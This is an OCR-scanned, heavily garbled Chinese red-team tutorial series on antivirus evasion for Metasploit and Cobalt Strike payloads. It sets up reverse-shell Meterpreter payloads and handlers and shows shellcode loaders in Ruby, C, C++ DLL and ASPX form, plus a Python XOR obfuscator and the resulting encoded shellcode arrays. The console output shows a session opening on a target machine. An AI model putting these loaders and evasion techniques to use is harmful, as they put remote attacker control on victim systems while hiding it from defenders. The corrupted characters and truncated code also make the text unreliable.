# msfvenom -p windows/messagebox ТЕХТ-Місгороог TITLE-Micropoor -f ruby --smalle 

shellcode - 
"xd9xebx9bxd9x74x24xf4x31xd2xb2x77x31xc9x64" + 
"X8bx71x30x8bx76x0cx8bx76x1cx8bx46x08x8bx7e" + 
"X20x8bx36x38x4fx18x75xf3x59x01xd1xffxe1x60" + 
"X8bx6cx24x24x8bx45x3cx8bx54x28x78x01xeax8b" + 
"X4ax18x8bx5ax20x01xebxe3x34x49x8bx34x8bx01" + 
"Xeex31lxffx31xcOxfcxacx84xc0x74x07xcixcfxOd" + 
"XOlxc7xebxfAx3bx7Cx24x28x75xelx8bx5ax24x01" + 
"xebx66x8bx8cx4bx8bx5axicxOlxebx8bxO4x8bx01" + 
"хе8х89х44х24х1сх61хс3хр2х08х29х04х89хе5х89" + 
"XC2x68x8ex4ex0execx52xe8x9fxffxffxffx89x45" + 
"X04xbbx7exd8xe2x73x87x1cx24x52xe8x8exffxff" + 
"XffX89x45x08x68X6CXx6CX20x41x68x33x32x2ex64" + 
"X68x75x73x65x72x30xdbx88x5cx24x0ax89xe6x56" + 
"Xffx55x04x89xc2x50xbbxa8xa2x4Adxbcx87x1cx24" + 
"X52xe8x5fxffxffxffx68x72x58Xx20x20x68x6fx70" + 
"X6fx6fx68x4dx69x63x72x31xdbx88X5CcX24Xx09x89". + 
"Xe3x68x72x58x20x20x68x6fx70x6fx6fx68x4dx69" + 


"х63х72х31хс9х88х4сх24х09х89хе1х31х02х52х53" + 
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"x51x52xffxd0x31xc0x50xffx55x08" ү 


include Fiddle 


kernel32 = Fiddle.dlopen('kernel32') 


ptr = Function.new(kernel32['VirtualAlloc'], [4,4,4,4], 4).са11(0, shellcode.siz 


Function.new(kernel32['VirtualProtect'], [4,4,4,4], 4).call(ptr, shellcode.size, 


buf - Fiddle::Pointer[shellcode] 


Function.new(kernel32['RtlMoveMemory'], [4, 4, 4], 4).call(ptr, buf, shellcode.s 


thread - Function.new(kernel32['CreateThread'], [4,4,4,4,4,4], 4).call(0, 0, ptr 


Function.new(kernel32['WaitForSingleObject'], [4,4], 4).call(thread, -1) 
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dll 加 载 shellcode 免 杀 上 线 


0x01 MSF 生成 shellcode 


msfvenom -a x86 --platform Windows -p windows/meterpreter/reverse tcp uuid 
LPORT-9999 LHOST-192.168.1.1 -e x86/shikata ga nai -i 11 -f c -o shellcode.c 


shellcode# msfvenom -a x86 --platform Windows -p windows/meterpreter 
/reverse tcp uuid LPORT=9999 LHOST=192.168.111.145 -e x86/shikata ga nai -i 11 
f c -o payload.c 
Found 1 compatible encoders 
Attempting to encode payload with 11 iterations of x86/shikata да паі 
x86/shikata ga nai succeeded with size 401 (iteration=0) 
x86/shikata ga nai succeeded with size 428 (iteration=1) 
x86/shikata ga nai succeeded with size 455 (iteration=2) 
x86/shikata ga nai succeeded with size 482 (iteration=3) 
x86/Shikata да nai succeeded with size 509 (iteration=4) 
x86/shikata ga nai succeeded with size 536 (iteration-5) 
x86/shikata ga nai succeeded with size 563 (iteration-6) 
x86/shikata ga nai succeeded with size 590 (iteration-7) 
x86/shikata ga nai succeeded with size 617 (iteration-8) 
x86/shikata ga nai succeeded with size 644 (iteration=9) 
x86/shikata ga nai succeeded with size 671 (iteration=10) 
x86/shikata ga nai chosen with final size 671 
Payload size: 671 bytes 





0x02 MSF 监听 


msf > use exploit/multi/handler 

msf > set payload windows/meterpreter/reverse tcp uuid 
» set lhost 192.168.1.1 

msf » set lport 8888 
» set EnableStageEncoding true 

msf » set StageEncoder x86/fnstenv mov 

msf » exploit 


auxiliary( | md) > use exploit/multi/handler 
msf5 exploit( 1 ) > set payload windows/meterpreter/reverse tcp uuid 
reeefxad framework ows/meterpreter/reverse tcp uuid 
msfí5 exploit ( ) > set lhost 192.168.111.145 
lhost => 192.168.111.145 
т5 #5 exploit ( ) > set lport 9999 
lport => 9999 
msf5 exploit ( 39161) > set EnableStageEncoding true 
EnableStageEncoding => true 
msf5 exploit ( ipdler). > set StageEncoder x86/fnstenv mov 
StageEncoder => x86/fnstenv mov 
msf5 exploit(».| ае) run 


+}. Started reverse TCP handler on 192.168.111.145:9999 
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0x03 dll 代 码 


#include <Windows.h> 
// 这 是 导出 变量 的 一 个 示例 





extern "C" _declspec(dllexport) void _ cdecl start(HWND hwnd, HINSTANCE hinst, L 


( 
MessageBox(NULL,L" Title ",L"Hello",MB OK); 
unsigned char buf[] - 

"\xd9\xe9\xb8\x7fF\x13\x11\xad\.......... п 


void *exec = VirtualAlloc(0, sizeof buf, MEM COMMIT, PAGE EXECUTE READWRITE) 
memcpy(exec, buf, sizeof buf); 

((void(*)())exec) (); 

return; 


编译 生成 dl 文件 ， 上 传 到 目标 服务 器 ， 用 rundll32 运 行 


rundl132 xxxx.dll start 


C:\Users Administrator \Desktop>rund1132 Shellcode_d112.d1l test 


C: Users Administrator Desktop? 


1575 exploit > run 


Started reverse TCP handler on 192.168.111.145:9999 

Encoded stage with x86/fnstenv mov 

Sending encoded stage (179804 bytes) to 192.168.111.130 

Meterpreter session 2 opened (192.168.111.145:9999 -> 192.168.111.130:50991) at 2019-10-30 10:17:31 +0800 





0x04 dl 文件 免 杀 情况 
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5 AX 


' 击 红 队 百科 全 书 》 


Data 


OTfabidibce! ado del) 004997 ect 39a o 180 eva 
shelcede. di eii [ 


DETECTION DETAILS COMMUNITY 


harus . (D Trojn wind? Rozena 





借助 aspx 对 payload 进 行 分 离 免 杀 


Жік: 
Microsoft Windows Server 2003 
Enterprise Edition 


Service Pack 2 


注册 到 : 
John 





69813-640-9722366-45896 


计算 机 : 
Intel(R) Core (TM) 17-6700 CPU 
@ 3. 40GHz 
3.41 GHz, 2.00 GB 的 内 存 
物理 地 址 扩展 


网 站 | же | ISAPI WES | FAR 
目录 安全 性 | wa | 自 定 义 错 误 





ASP.NET 版 本 : BOSE Yn - 
RURE: ЖАНЫ 
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msf auxiliary(server/socks4a) » use exploit/multi/handler 

msf exploit(multi/handler) » set payload windows/meterpreter/reverse tcp uuid 
payload -» windows/meterpreter/reverse tcp uuid 

msf exploit(multi/handler) » set lhost 192.168.1.5 

lhost -» 192.168.1.5 

msf exploit(multi/handler) » set lport 53 

lport -» 53 

msf exploit(multi/handler) » set stageencoder x86/shikata ga nai 
stageencoder -» x86/shikata ga nai 

msf exploit(multi/handler) » set EnableStageEncoding true 
EnableStageEncoding -» true 

msf exploit(multi/handler) » set exitonsession false 
exitonsession -» false 

msf exploit(multi/handler) » show options 


Module options (exploit/multi/handler): 
Name Current Setting Required Description 


Payload options (windows/meterpreter/reverse_tcp_uuid): 


Name Current Setting Required Description 

EXITFUNC process yes Exit technique (Accepted: '', seh, three 
LHOST 192.168.1.5 yes The listen address 

LPORT 53 yes The listen port 


Exploit target: 


Id Name 


© Wildcard Target 


msf exploit(multi/handler) > exploit -j -z 
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> use exploit/multi/handler 
‘load windi eterpreter/reverse tcp uutd 
e tcp uuid 
> set lport 53 
) t staqeencoder hikata qa_nal 
36/shikata 
) » set EnableStageEncoding true 
tageEncoding -» true 
) > set exitonsession false 
ow options 


Jule options (exploit/multi/handler}; 


Current Setting Required Description 


options (windows /meterpreter/reverse tcp uuid) 


Current Setting Required 


ücess yes d: '', seh, thread, process, none) 
168.1,5 yes The listen addr 
The listen port 


pioit target 
Id Name 


Wildcard Target 


П? exploit( { | ) 
[+] oit running as kground job 1. 
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root@John:/tmp# msfvenom -a x86 -p windows/meterpreter/reverse tcp uuid LHOST=1¢ 
/usr/share/metasploit-framework/lib/msf/core/opt.rb:55: warning: constant Openss 
No platform was selected, choosing Msf::Module::Platform::Windows from the paylc 
Found 1 compatible encoders 

Attempting to encode payload with 5 iterations of x86/shikata ga nai 
x86/shikata ga nai succeeded with size 401 (iteration=0) 

x86/shikata ga nai succeeded with size 428 (iteration-i) 
x86/shikata ga nai succeeded with size 455 (iteration-2) 
x86/shikata ga nai succeeded with size 482 (iteration-3) 

x86/shikata ga nai succeeded with size 509 (iteration-4) 

x86/shikata ga nai chosen with final size 509 

Payload size: 509 bytes 

Final size of csharp file: 2610 bytes 

byte[] buf = new byte[509] í 

Oxd9, Oxcc, Oxd9, 0x74, 0x24, Oxf4, Ox5a, Oxb8, 0x76, Ох1е, Ox3d, 0x54, Ox2b, Oxc9, Oxb1, 
0x79, 0x83, Oxc2, 0x04, 0x31, 0x42, 0x15, 0x03, 0x42, 0x15, 0x94, Oxeb, 0x83, 0x64, Ox7e, 
0x17,0xee, Ox5e, 0xa8, Oxce, 0x7a, 0x7b, 0xa0, хае, Oxab, 0x4a, Oxf9, 0x23, Ox2f , Oxa3, 
0x05, Oxf2, 0x58, Ox2d, Oxf6, 0x82, Oxb7, Oxaf , Ox3d, 0x91, Ox7c, 0x80, Охба, Oxd8, Oxba, 
Ox3b, 0x5a, Oxda, 0xb6, Oxca, Охс8, Oxeb, хой, Ox8c, 0x2a, 0x94, Oxc2, 0x85, 0x87, Oxbc, 
0x25, Oxd1, Ox6e, 0x64, Oxfe, OxcO, Oxf6, Ox5e, Ox9f , 0x15, 0x80, 0x17, Ox8f, Oxaa, Oxae, 
Oxff,0x22,0x6b, Ox6b, 0x46, 0x14, Ox4c, 0x66, 0x50, Oxcb, Ox1f , Ox29, 0x00, 0x27, Ox4c, 
0x19, 0x12, 0x09, 0x98, 0x38, Ox3e, 9x6c, 0xa2, 0x22, 0x60, Oxbf , 0x99, Oxdb, 0xe7,0xc5, 
Оха2, 0x46, 0x18, Oxbd, Oxc4, Охае, Oxd7, 0x82, Oxe3, Oxbd, Oxfe, 0x40, 0x33, Oxf6, Oxd2, 
Охта, Ox6b, Oxe1, Ox2f , OxF9, Ox4b, Ox8b, Oxc3, 0x57, 0x26, Oxfe, Oxfd, 0x91, Oxf7, 0x93, 
0x4a, 0xe1, 0x85, Oxeb, 0x68, 0x16, 0x42, Oxc9, Ox6f , Oxac, Oxef, 0x28, 0x05, 0x46, 0x76, 
Ox1b, 0xa3, Oxb9, Oxe9, Oxbf , Ох1а, 0x56, Ox3e, Oxdc, Ox4d, Oxf3, Ox9f , Ox1b, 9x09, 0x55, 
0x63,0x07,0xa3, 0x59, Oxbc, 0x57, Oxad, 0x72, 0x53, Ox6b, Oxff , 0x49, 0x10, 0x47 , 0x21, 
0x81, Oxb8, Ox0e, 0x98, Oxec, 0x03, Oxa3, Ox9f , 0x90, Oxa3, 0x15, Oxc4, Ox7d, 0x87, Ox5c, 
Охса, Oxfe, 0x32, Oxca, 0x11, Oxf 3, 0x14, 0x20, Oxc8, 0x92, 0x36, 0x88, Oxe8, Оха1, Oxad, 
0xac, 0x46, 0x19, Ox9f , 0x04, 0x76, 0x01, 0x41, Ox3d, 0x3a, Ox7d, 0x80, 0xa2, Ox4e, Ox24, 
Oxcb, Ox6b, 0xe7, 0xc9, Oxc8, 0xa4, 0x01, 0x17, Oxb3, 0x3a, Oxd9, Ox8e, Ox9b, 0x13, Ox7b, 
Oxbf, 0x49, 0xf3, 0xa9, 0x71, 0x57, 0x49, 0x54, 0x60, 0x32, Oxf4, Ox4e, Oxfa, 0x76, Oxf8, 
0x38, Ox7c, Oxb7, Ox6b, Oxac, Oxc1, 0x27, Ox6b, Oxae, 0x80, 0x10, 0x85, 0x98, 0x61, 0x42, 
Oxie, 0x1e,0xb0, 0x58, Ox6b, Oxf f, 0x92, 0x68, Oxa5, 0x29, 0x45, 0x99, Ox9c, Oxa2, OxcO, 
0x29, 0x53, Oxc3, Ox4b, 0x76, 0x72, 0x17, 0x60, Ox3d, Oxd8, 0x11, Oxce, OxcO, Oxe6, 0x34, 
0xa1,0x26,0x65,0x98, 0x79, Oxf6, 0x58, 0x92, 0x41, 0x04, Oxa0, OxfO, Ox3d, Oxf1, 0x44, 
Oxb9, 0x63, 0x42, 0x1a, Oxac, Oxad, 0x67, 0x98, Ox8f , 0x27, 0x73, Oxdd, 0x54, 0x61, 0x65, 
Oxd1, 0x72, 0xc5, OxOf , Ox8a, Oxd3, 0x80, Ox6a, Oxc3, Oxf6, 0x44, Ox2f , Ox1a, Ox6a, Oxe6, 
Oxfa, 0x6c, 0xa5, 0x95, 0x54, 0x47, 0x54, Oxbf , Ox66, 0x78, Oxfd, 0x40, 0x10, 0x62, Oxe8, 
0xc0, 0x93, Oxa8, 0x80, 0хр9, 0x37, 0x4c, Ox47, Ox7b, 0x61, Oxc1, 0x44, 0x13, 0x17, 0x7f, 
0xa2, 0x73, Oxcd, 0x76, 0x5f, 0x2a, 0x98, 0x92, Ox3e, 0x09, Oxa3, 0x60, Oxeb, 0x41, Oxia, 
Oxf4, Oxcb, Ox6f, 0x96, Oxc6, Ox3c, OxfO, Oxda, Oxc6, Ox1c, Oxic, Oxb6, OxaO, 0x64, 0x67, 
0x7b, Oxdc, 0xe2, 0x43, Oxf 1, Oxee, Ox3b, 0x93, Oxb9, 0x95, 0x29, 0x01, 0x97, Ox8C, 0x09, 
0x72, 0xee, 0x78, Ox1a, 0x13, 0x60, 0xa6, Oxac, 0x05, 0x99, Ox6c, 0x28, 0x81, 0x29, Ox5d, 
0x37, 0x89, 0x2a, Ox3d, Oxbf , Ox0e, Oxc7, Oxeb, Ox9f , 0x44, Ox1d, Oxb3, Ox4d, Ox1a, Oxbc, 
0xe2, 0x22, Oxb2, Oxb3, Өхаб, 0x43, OX3e, 0x46, Oxc5, OxOd, Oxba, 0x87, Oxd5, Ox6d, 0x70, 
Oxfe, 0x87, 0x58, Ox2c, Ox4b, Ox8C, Ox2d, 0x56, 0x21, Ox4a, Oxbf , 0x45, OxBc, Oxd9, Ox9e, 
0xa8, Oxe4, 0x20, Ox6b, Ox7F, Oxfb, OxdO, Ox1e, 0x88, 0x13, 9x6e, 0x11, Oxe9, 9xd9 һ 
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Ej 5555. aspx 








<%( . > em" 


em. Runtime. Intero 


АРгосі); 


díobj3ect send 


ta2,0x22, 


0х6 


1,0 


Ox 


0х7 


ӨХ 
Охе2,0х2 


Oxfe,0 





Оха0,0 


IntPtr handle = IntPtr.Zero 





handle = Virtualàlloc( 


Ту Г Parn 











Sosa cnl. 824 o 


Мате 


winlogon. ex 
services exe 


wawp exe NT AUTHORITY } г c: \window 


$vchost.exe 
ychost.e 
svehost.e 
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interface 


1 OO: 00 


1521 


address : 127.0.0.1 


nterface 65539 


10/1000 MT Network Connection 
:29:af:ce:cc 


192.168.1.115 
299.299.299, 0 
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<%0 Page Language="C#" AutoEventWireup="true" Inherits-"System.Web.UI.Page" %> 
<%@ Import Namespace-"System" %> 
«99 Import Namespace-"System.Runtime.InteropServices" %> 
<script runat="server"> 
delegate int MsfpayloadProc(); 
protected void Page_Load(object sender, EventArgs e) 


byte[] buf = codeBytes[509] { 

Oxd9, Oxcc, 0xd9, 0x74, 0x24, Oxf4, Ox5a, Oxb8, 0x76, Ox1e, Ox3d, 0x54, Ox2b, Oxc9, Ox 
0x79, 0x83, Oxc2, 0x04, 0x31, 0x42, 0x15, 0x03, 0x42, 0x15, 0x94, Oxeb, 0x83, 0x64, Ox 
0x17,0xee,0x5e, 0xa8, Oxce, 0x7a, Ox7b, хаб, Oxae, Oxab, охда, Oxf9, 0x23, Ox2F, Ox 
0x05, Oxf2, 0x58, Ox2d, Oxf 6, 0x82, Oxb7, Oxaf , Ox3d, 0x91, Ox7c, 0x80, Охба, Oxd8, Ox 
Ox3b, 0x5a, Oxda, Oxb6, Oxca, Oxc8, Oxeb, OxOd, Ox8c, Ox2a, 0x94, Oxc2, 0x85, 0x87, Ox 
0x25, 0xd1,0x6e, 0x64, Oxfe, OxcO, Oxf6, Ox5e, Ox9f , 0x15, 0x80, 0x17, Ox8f , Oxaa, Ox 
Oxff,0x22,0x6b, Ox6b, 0x46, 0x14, Ox4c, 0x66, 0x50, Oxcb, Ox1f , 0x29, 0x00, 0x27, Ox 
0x19, 0x12, 0x09, 0x98, 0x38, Ox3e, Ox6C, 0xa2, 0x22, 0x60, Oxbf , 0x99, Oxdb, 0xe7, Ox 
0xa2, 0x46, 0x18, Oxbd, Oxc4, Oxae, Oxd7, 0x82, Oxe3, Oxbd, Oxfe, 0x40, 0x33, Oxf6, Ox 
Охта, Ox6b, Охе1, Ox2f , Oxf9, Ox4b, Ox8b, Oxc3, 0x57, 0x26, Oxfe, Oxfd, 0x91, Oxf7, Ox 
0x4a, Oxe1, 0x85, Oxeb, 0x68, 0x16, 0x42, Oxc9, Ox6f , Oxac, Oxef , 0x28, 0x05, 0x46, Ox 
Ox1b, 0xa3, Oxb9, Oxe9, Oxbf, Ox1a, 0x56, Ox3e, Oxdc, Ox4d, Oxf3, Ox9f , Ox1b, 0x09, Ox 
0x63, 0x07, 0xa3, 0x59, Oxbc, 0x57, Oxad, 0x72, 0x53, Ox6b, Oxff , 0x49, 0x10, 0x47, Ox 
0x81, Oxb8, Ox0e, 0x98, Oxec, 0x03, Oxa3, Ox9f , 0x90, Oxa3, 0x15, Oxc4, Охта, 0x87 , Ox 
Oxcd, Oxfe, 0x32, Oxca, 0x11, Oxf3, 0x14, 0x20, Oxc8, 0x92, 0x36, 0x88, Oxe8, Oxa1, Ox 
Oxac, 0x46, 0x19, Ox9f , 0x04, 0x76, 0x01, 0x41, Ox3d, Ox3a, Ox7d, 0x80, Oxa2, Ox4e, Ox 
Oxcb, Ox6b, 0xe7, Oxc9, Oxc8, Oxa4, 0x01, 0x17, Oxb3, Ox3a, Oxd9, Ox8e, Ox9b, 0x13, Ox 
Oxbf, 0x49, 0xf3, 0xa9, 0x71, 0x57, 0x49, 0x54, 0x60, 0x32, Oxf 4, Ox4e, Oxfa, 0x76, Ox 
0x38, 0x7c, Oxb7, Ox6b, Oxac, Oxc1, 0x27, Ox6b, Oxae, 0x80, 0x10, 0x85, 0x98, 0x61, Ox 
Ох1е, Ox1e, OxbO, 0x58, Ox6b, Oxff , 0x92, 0x68, Oxa5, 0x29, 0x45, 0x99, Ox9c, Oxa2, Ox 
0x29, 0x53, Oxc3, Ox4b, 0x76, 0x72, 0x17, 0x60, Ox3d, Oxd8, 0x11, Oxce, OxcO, Oxe6, Ox 
Oxa1, 0x26, 0x65, 0x98, 0x79, Oxf6, 0x58, 0x92, 0x41, 0x04, OxaO, OxfO, Ox3d, Oxf1, Ox 
Oxb9, 0x63, 0x42, 0x1a, Oxac, Oxad, 0x67, 0x98, 0x8f , 0x27 , 0x73, Oxdd, 0x54, 0x61, Ox 
Оха1, 0x72, 0xc5, OxOf , Ox8a, Oxd3, 0x80, Ox6a, Oxc3, Oxf6, 0x44, Ox2f, Ox1a, Охба, Ox 
Oxfa, 0x6c, 0xa5, 0x95, 0x54, 0x47, 0x54, Oxbf , 0x66, 0x78, Oxfd, 0x40, 0x10, 0x62, Ox 
0xc0, 0x93, 0xa8, 0x80, Oxb9, 0x37, Ox4c, 0х47, Ox7b, 0x61, Oxc1, 0x44, 0x13, Ox17, Ox 
0xa2, 0x73, Oxcd, 0x76, Ox5f, 0x2a, 0x98, 0x92, Ox3e, 0x09, Oxa3, 0x60, Oxeb, 0x41, 0» 
Oxf4, Oxcb, Ox6f, 0x96, Oxc6, Ox3c, Oxf0, Oxda, Oxc6, Ox1c, Ox1c, Oxb6, 0xa0, 0x64, Ox 
0x7b, Oxdc, 0xe2, 0x43, Oxf1, Oxee, Ox3b, 0x93, Oxb9, 0x95, 0x29, 0x01, 0x97, Ox8c , Ox 
0x72, 0xee, 0x78, 0x1a, 0x13, 0x60, Oxa6, Oxac, 0x05, 0x99, Ox6c, 0x28, 0x81, 0x29, OX 
0x37, 0x89, 0x2a, Ox3d, Oxbf, OxOe, Oxc7, Oxeb, Ox9f, 0x44, Ox1d, Oxb3, Ox4d, 0x1a, Ox 
0xe2, 0x22, Oxb2, Oxb3, Oxa6, 0x43, Ox3e, 0x46, Oxc5, OxOd, Oxba, 0x87, Oxd5, Ox6d, Ox 
Oxfe, 0x87, 0x58, Ox2c, Ox4b, Ox8c, Ox2d, 0x56, 0x21, Ox4a, Oxbf , 0x45, Ox8C, Oxd9, Ox 
0xa0, Oxe4, 0x20, Ox6b, Ox7f , Oxfb, OxdO, Ox1e, 0x88, 0x13, 0x6e, 0x11, Oxe9, Oxd9 М 
IntPtr handle - IntPtr.Zero; 

handle - VirtualAlloc( 

IntPtr.Zero, 

codeBytes.Length, 

MEM COMMIT | MEM RESERVE, 

PAGE EXECUTE READWRITE) 5 
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try 
í ” 
Marshal.Copy(codeBytes, 0, handle, codeBytes.Length); 
MsfpayloadProc msfpayload 
- Marshal.GetDelegateForFunctionPointer(handle, typeof(Msfpe 


msfpayload(); 
} 
finally 
4 
VirtualFree(handle, 0, МЕМ RELEASE); 
) 
} 


[DllImport("Kernel32.dll", EntryPoint = "VirtualAlloc")] 
public static extern IntPtr VirtualAlloc(IntPtr address, int size, uint 
[DllImport("Kernel32.dll", EntryPoint = "VirtualFree") ] 
public static extern bool VirtualFree(IntPtr address, int size, uint fre 
const uint MEM COMMIT = 0х1000; 
const uint MEM RESERVE = 0x2000; 
const uint PAGE EXECUTE READWRITE - 0x40; 
const uint MEM RELEASE = 0x8000; 
«/script» 
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静态 恶意 代码 逃逸 (第 一 课 ) 
前 


前 五 课 的 代码 将 会 上 传 至 投稿 平台 ， 免 费 下 载 研究 


在 此 之 前 ， 我 在 我 们 的 安 服 攻防 技术 分 享 群 中 的 第 二 期 技术 分 享 过 《高 级 后 渗透 C2 免 杀 与 对 抗 》， 
其 中 对 于 一 些 原理 铺垫 上 稍 有 欠缺 ， 因 此 准备 分 成 几 篇 文章 来 展开 。 


0X01 恶意 代码 的 定义 


以 下 文章 中 的 所 有 关于 恶意 代码 的 定义 都 以 Cobaltstrike 的 载荷 为 例 。 


Dif 


0x02 Shellcode5E X. 


Shellcode 是 一 段 机 器 指令 的 集合 ， 通 常会 被 压缩 至 很 小 的 长 度 ， 达 到 为 后 续 恶 意 代 码 铺垫 的 作用 。 
当然 你 可 以 通过 msfvenom 生 成 各 种 用 于 测试 的 shellcode。 


0x03 RAW 文 件 


RAW 中 文 意思 是 原始 的 、 示 经 加 工 的 ， 通 常 使 用 Cobaltstrike 生 成 的 BIN 文 件 。 





BY Payload Generator = D x 


This dialog generates a payload to stage a Cobalt 
Strike listener. Several output options are available 


Listener. Test ‚|| 


Output Raw 
x64 1 Use x64 payload 


| Generate || Help | 





RAW 文件 是 可 以 直接 进行 字 节操 作 读 取 的 ， 因 此 加 载 到 内 存 较 为 方便 ， 通 常 我 一 般 使 用 混淆 的 方式 
再 生成 一 遍 。 


0x04 C 文 件 
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a generates a payload to stage a Cobalt 
er Several output options are available + 








| Help | 


enero. 
4 的 是 一 个 C 语 言 中 的 字符 数组 ， 也 是 可 以 通过 以 字 节 单位 操作 的 。 


组 合 


- 反 病 毒 软件 对 于 默认 生成 的 文件 查 杀 较为 严格 ， 我 通常 会 采用 混淆 、 加 密 解密 的 方式 把 载荷 还 


E 
po 
$ 
nk 
172 
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mport Sys 
from 


argparse import ArgumentParser, FileType 


shellcode - 
shellcode size - 
shellcode raw - 


code = src Ұр.геаа(!) 
code -- 


base10 = ord(code) ^ num 

расе10 str = chr(base10) 
shellcode raw += basei10 str.encode() 
code hex = hex(base10) 


code hex = code hex.replace( ' 0x','') 
if(len(code hex) == 1): 

code hex = 02! + code hex 
shellcode += ‘\\x' + code hex 


shellcode size *- 
src. fp.close() 
dst raw.write(shellcode raw) 
dst raw.close() 
dst fp.write(shellcode) 
dst fp.close() 
return shellcode. size 
except Exception às e: 
sys.stderr.writelines(str(e)) 


ode X', descriptionz'[XOR The Cobaltstri 





parser = ArgumentParser(prog- Sh: 





parser.add argument( -v', version',nargsz'?') 

parser.add argument('-s','--src',helpzu'source bin ile',type-FileType('rb') 
parser.add argument(' -d','--dst',helpzu'à ion shell: 'ile',type-Fil 
parser.add argument( -^', ium’, helpzu'Conf number',typezint, default= 
parser.add argument( -F ， raw',helpzu'output bin file', type=FileType( wb' 


args - parser.parse args() 
shellcode size - process bin(args.num, args.src, args.dst, args.raw) 
sys.stdout.writelines("[*]Shellcode Size : 4; 1". format (shellcode_size) ) 
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mus 






ee ў 


件 ， 然后 运行 python 脚 本 : 


.\xor_shellcoder.py -s .\payload.bin -d payload.c -n 10 


.C 中 会 看 到 raw 文 件 里 的 每 一 个 字 节 与 10 的 异 或 运算 出 的 C 语 言 数组 。 
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的 内 容 ， 将 由 下 一 篇 文章 用 到 ， 实 践 一 下 《Shellcode 混 淆 免 亲 》。 
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静态 恶意 代码 逃逸 (第 二 课 ) 
0x01 关于 Windows 操 作 系 统 内 存 


前 五 课 的 代码 将 会 上 传 至 投稿 平台 ， 免 费 下 载 研究 


这 里 还 是 稍微 展开 介绍 一 下 ，Windows 操 作 系统 的 内 存 有 三 种 属性 ， 分 别 为 : 可 读 、 可 写 、 可 执 
行 ， 并 且 操作 系统 将 每 个 进程 的 内 存 都 隔离 开 来 ， 当 进程 运行 时 ， 创 建 一 个 虚拟 的 内 存 空间 ， 系 统 
的 内 存 管理 器 将 虚拟 内 存 空间 映射 到 物理 内 存 上 ， 所 以 每 个 进程 的 内 存 都 是 等 大 的 。 


操作 系统 给 予 每 个 进程 申请 内 存 的 权力 ， 使 用 不 同 的 AP1， 申 请 的 内 存 具 有 不 同 的 涵义 。 


在 进程 申请 时 ， 需 要 声明 这 块 内 存 的 基本 信息 : 申请 内 存 大 小 、 申 请 内 存 起 始 内 存 基 址 、 申 请 内 存 
属性 、 申 请 内 存 对 外 的 权限 等 。 


申请 方式 :; 


* HeapAlloc 
e malloc 

• VirtualAlloc 
“ new 
LocalAlloc 


0x02 申请 内 存 API 的 关系 


其 实 以 上 所 有 的 内 存 申请 方式 都 与 VirtualAlloc 有 关 ， 因 为 VirtualAlloc 申 请 的 单位 是 “页 "。 而 
Windows 操 作 系 统管 理 内 存 的 单位 也 是 “页 "。 


0x03 实现 一 次 正常 加 载 


这 里 我 创建 了 一 个 C++ 项 目 ， 名 字 为 : BadCode 


先 来 使 用 cobaltstrike 默 认 的 shelicode 进 行 加 载 ， 为 了 方便 阅读 参考 ， 在 代码 中 我 会 尽量 留 下 注释 。 
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7 


ize = sizeof(buf); 


Eu 

大 小 

IT, // 内 存 页 状态 
CUTE_READWRITE // 可 读 可 写 可 执行 


llcode = (char *)virtualAlloc( 


lcode size, 
_COMMIT, 
E EXECUTE READWRITE 


将 shellcode 复 制 到 可 执行 的 内 存 页 中 
ory(shellcode,buf,shellcode size); 


= CreateThread( 

LL, // 安全 描述 符 

NULL, // 栈 的 大 小 

= (LPTHREAD START ROUTINE)shellcode, // 函数 
JO NULL, // 参数 

x NULL, // 线程 标志 

22 &dwThreadId // 线程 ID 

| ); 


| MaitForSingleObject(hThread, INFINITE); // 一 直 等 待 线程 执行 结束 
return 0; 


M 
e 
M 
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编译 成 功 后， 运行 : 


ugomgzomt»ucehooeNBNoo 
extemal nemai + 





这 个 效果 已 经 很 好 ， 但 是 我 想 要 更 好 。 


0x04 实现 一 次 混淆 加 载 


使 用 之 前 的 Python 脚本 混淆 生成 RAW 文件 ， 最 后 得 到 混淆 后 的 数组 : 
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lude <Windows.h> 


/ 入 口 函数 
it wmain(int argc,TCHAR * argv[]){ 


int shellcode size = 0; // shellcodeKE 
| DWORD dwThreadid; // 线程 TD 

. HANDLE hThread; // 线程 句柄 

length: 800 bytes */ 


// 获取 shellcode 大 小 
lellcode size = sizeof(buf); 


增加 异 或 代码 */ 
nt i = 0;i<shellcode_size; i++){ 
buf[i] A= 10; 


















tualAlloc( 

г NULL, // 基 址 

800, // 大 小 

MEM COMMIT, // 内 存 页 状态 

. PAGE EXECUTE READWRITE // 可 读 可 写 可 执行 
» 


ar * shellcode - (char *)VirtualAlloc( 

NULL, 

shellcode size, 

MEM COMMIT, 

PAGE EXECUTE READWRITE 

); 

// 将 shellcode 复 制 到 可 执行 的 内 存 页 中 
pyMemory(shellcode, buf, shellcode_size); 


_hThread = CreateThread( 
— NULL, // 安全 描述 符 
NULL, // 栈 的 大 小 
(LPTHREAD START ROUTINE)shellcode, // 函数 
NULL, // 参数 
NULL, // 线程 标志 
&dwThreadId // 线程 ID 
) ; 
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signed char buf[] = "Nxf6Nxe2Nx83NxQaNx0aNxQaNx6aNx83NxefNx3bNxd8Nx6eNx81Nx58N 


WaitForSingleObject(hThread, INFINITE); // 一 直 等 待 线程 执行 结束 


return 0; 





oes £ 
ES wmain 
4 % adcode 
¥ з e 
` 
` 
= 
buf 
shellcode_size и 
e; i«shellcode 
16; 
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静态 恶意 代码 逃逸 (第 三 课 ) 
0x01 关于 内 存 申请 的 优化 


前 五 课 的 代码 将 会 上 传 至 投稿 平台 ， 免 费 下 载 研究 
本 章 只 提 太 一 下 关于 VirtualAlloc 的 建议 。 


在 申请 内 存 页 时 ， 一 定 要 把 控 好 属性 ， 可 以 在 Shellcode 读 入 时 ， 申 请 一 个 普通 的 可 读 写 的 内 存 页 ， 
然后 再 通过 VirtualProtect 改 变 它 的 属性 -- 可 执行 。 
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#include <Windows.h> 


// ЛОВ 
int wmain(int argc,TCHAR * argv[]){ 


int shellcode size = 0; // shellcode 长 度 
DWORD dwThreadId; // 线程 ID 
HANDLE hThread; // 线程 句柄 
DWORD dwOldProtect; // 内 存 页 属性 
/* length: 800 bytes */ 


unsigned char buf[] = "Nxf6Nxe2Nx83NxQaNxQ0aNxQaNx6aNx83NxefNx3bNxd8Nx6eNx81Nx58N 


// 获取 shellcode 大 小 \ 
shellcode size = sizeof(buf); 


/* 增加 异 或 代码 */ 

for(int i = 0;i«shellcode size; i++){ 
buf[i] A= 40; 

} 

/* 

VirtualAlloc( 
NULL, // 基 址 
800, // 大 小 
МЕМ COMMIT, // 内 存 页 状态 
PAGE_EXECUTE_READWRITE // 可 读 可 写 可 执行 
); 

БА 


char * shellcode = (char *)VirtualAlloc( 
